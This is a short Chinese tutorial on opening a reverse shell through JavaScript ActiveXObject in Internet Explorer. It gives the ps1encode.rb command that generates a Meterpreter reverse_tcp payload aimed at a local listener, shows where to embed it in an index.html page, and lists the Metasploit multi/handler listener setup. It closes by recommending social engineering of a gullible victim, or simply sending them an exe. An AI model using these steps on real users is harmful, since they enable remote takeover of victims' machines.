JavsScript
是可以通过创建ActiveXObject
来执行命令,但是基本上不会存在,因为需要一定的设置且使用ie
浏览器打开
漏洞复现设置
默认是没有开启
ActiveX
控件的,那么我们可以自己设置
复现过程
这里用js
反弹shell
使用如下命令生成反弹shell
的js
代码
1 | ./ps1encode.rb --LHOST 192.168.31.133 --LPORT 6666 --PAYLOAD windows/meterpreter/reverse_tcp --ENCODE cmd -t js |
然后把他放到index.html
页面,代码如下
1 | <script type="text/javascript"> |
2 | |
3 | 生成的js代码 |
4 | |
5 | </script> |
然后在msf
上面监听
1 | msf5 > use exploit/multi/handler |
2 | msf5 exploit(multi/handler) > set LHOST 192.168.31.133 |
3 | LPORT => 192.168.31.133 |
4 | msf5 exploit(multi/handler) > set LPORT 6666 |
5 | LPORT => 6666 |
然后在ie
浏览器上打开index.html
页面,在msf
就成功接收到反弹过来的shell
了
如果对方足够傻的情况下,是可以利用社工完成这些设置操作步骤的,但是如果真够傻的话往常直接丢exe
给他更好。